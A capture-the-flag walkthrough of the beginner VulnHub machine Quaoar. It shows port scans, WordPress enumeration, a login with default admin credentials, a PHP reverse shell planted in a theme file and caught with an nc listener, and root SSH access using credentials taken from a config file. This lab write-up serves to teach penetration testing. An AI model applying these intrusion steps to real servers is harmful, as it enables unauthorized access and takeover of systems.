hackfest2016: Quaoar
Location
https://download.vulnhub.com/hackfest2016/Quaoar.ova
Description
This is a vulnerable machine created for the Hackfest 2016 CTF http://hackfest.ca/
It has level beginner for those who wish to learn more about pentesting/hacking.
Getting started
I start with a nmap scan to see what ports are open and what is running behind those ports.
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $nmap -A -T4 -p- 192.168.171.2 Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 16:41 CET Nmap scan report for 192.168.171.2 Host is up (0.024s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA) | 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA) |_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA) 53/tcp open domain ISC BIND 9.8.1-P1 | dns-nsid: |_ bind.version: 9.8.1-P1 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: STLS CAPA TOP UIDL PIPELINING RESP-CODES SASL | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-03-17T16:43:23+00:00; +59m58s from scanner time. 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: LOGIN-REFERRALS listed OK have ENABLE Pre-login capabilities IDLE LOGINDISABLEDA0001 LITERAL+ SASL-IR ID post-login STARTTLS more IMAP4rev1 | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time. 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time. 995/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: CAPA USER TOP UIDL PIPELINING RESP-CODES SASL(PLAIN) | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server | Not valid before: 2016-10-07T04:32:43 |_Not valid after: 2026-10-07T04:32:43 |_ssl-date: 2017-03-17T16:43:24+00:00; +59m58s from scanner time. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.6.3) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2017-03-17T12:43:23-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 149.23 seconds
Looks like a lot of open ports and services.
Webserver
I start of with Dirb to enumerate the pages.
---- Scanning URL: http://192.168.171.2/ ---- + http://192.168.171.2/hacking (CODE:200|SIZE:616848) + http://192.168.171.2/index (CODE:200|SIZE:100) + http://192.168.171.2/index.html (CODE:200|SIZE:100) + http://192.168.171.2/robots (CODE:200|SIZE:271) + http://192.168.171.2/robots.txt (CODE:200|SIZE:271) ==> DIRECTORY: http://192.168.171.2/upload/ ==> DIRECTORY: http://192.168.171.2/wordpress/
Dirb did its work nicely and spat out a very long list, which I cut down to a small piece.
Most interesting is the wordpress site. To enumerate this site I use wpscan.
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.2
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.171.2/wordpress/
[+] Started: Fri Mar 17 17:30:27 2017
[!] The WordPress 'http://192.168.171.2/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.171.2/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.171.2/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.171.2/wordpress/wp-includes/
[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[.....SNIP.....]
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16
[.....SNIP.....]
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+--------+--------+
| Id | Login | Name |
+----+--------+--------+
| 1 | admin | admin |
| 2 | wpuser | wpuser |
+----+--------+--------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Fri Mar 17 17:31:29 2017
[+] Requests Done: 4344
[+] Memory used: 49.875 MB
[+] Elapsed time: 00:01:01
It looks like the default username is still active. I would normally try to brute force the password of the found username. But because it has the default settings in place I try admin:admin first.
And I’m in.
To get a reverse shell I change the ‘search.php’ file and replace the PHP code with the one from pentestmonkey. After I set up a listener I run the code by pressing the search button.
┌─[n13mant@planetmars]─[~] └──╼ $nc -lvnp 31337 Listening on [0.0.0.0] (family 0, port 31337) Connection from 192.168.171.2 49617 received! Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux 14:57:19 up 2:19, 0 users, load average: 0.18, 0.12, 0.08 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off
Recon
$ cd /home $ ls -lah total 12K drwxr-xr-x 3 root root 4.0K Oct 24 03:19 . drwxr-xr-x 22 root root 4.0K Oct 7 00:32 .. drwxr-xr-x 2 root root 4.0K Oct 22 12:53 wpadmin $ cd wpadmin $ ls lah ls: cannot access lah: No such file or directory $ ls -lah total 12K drwxr-xr-x 2 root root 4.0K Oct 22 12:53 . drwxr-xr-x 3 root root 4.0K Oct 24 03:19 .. -rw-r--r-- 1 wpadmin wpadmin 33 Oct 22 12:53 flag.txt $ cat flag.txt 2bafe61f03117ac66a73c3c514de796e
First flag. Looks like a md5 hash.
$ cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
www-data@Quaoar:/home/wpadmin$ netstat -ant netstat -ant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
After connecting with the MySQL server it appeared the database had no useful information in it.
When browsing to /var/www/ I stumbled upon config.php.
// config file created by LEPTON 2.2.0
define('DB_TYPE', 'mysql');
define('DB_HOST', 'localhost');
define('DB_PORT', '3306');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_NAME', 'Lepton');
define('TABLE_PREFIX', 'lep_');
It had root credentials inside.
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $ssh root@192.168.171.2 root@192.168.171.2's password: Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Fri Mar 17 15:44:22 EDT 2017 System load: 0.17 Processes: 103 Usage of /: 30.0% of 7.21GB Users logged in: 0 Memory usage: 46% IP address for eth0: 192.168.171.2 Swap usage: 0% IP address for virbr0: 192.168.122.1 Graph this data and manage this system at https://landscape.canonical.com/ New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com root@Quaoar:~#
Now for the next flag.
root@Quaoar:~# cd /root root@Quaoar:~# ls -lah total 48K drwx------ 6 root root 4.0K Nov 30 19:52 . drwxr-xr-x 22 root root 4.0K Oct 7 00:32 .. drwx------ 2 root root 4.0K Oct 7 00:30 .aptitude -rw------- 1 root root 368 Jan 15 11:25 .bash_history -rw-r--r-- 1 root root 3.1K Apr 19 2012 .bashrc drwx------ 2 root root 4.0K Oct 15 19:23 .cache ---------- 1 root root 33 Oct 22 12:44 flag.txt -rw-r--r-- 1 root root 140 Apr 19 2012 .profile drwx------ 2 root root 4.0K Oct 26 20:50 .ssh -rw------- 1 root root 4.7K Nov 30 19:40 .viminfo drwxr-xr-x 8 root root 4.0K Jan 29 2015 vmware-tools-distrib root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb
The description said something about a post exploitation flag. Unfortunately I didn’t found any.
Oh well. Got root…..so game over. This was the easiest of the three. Time for number 2.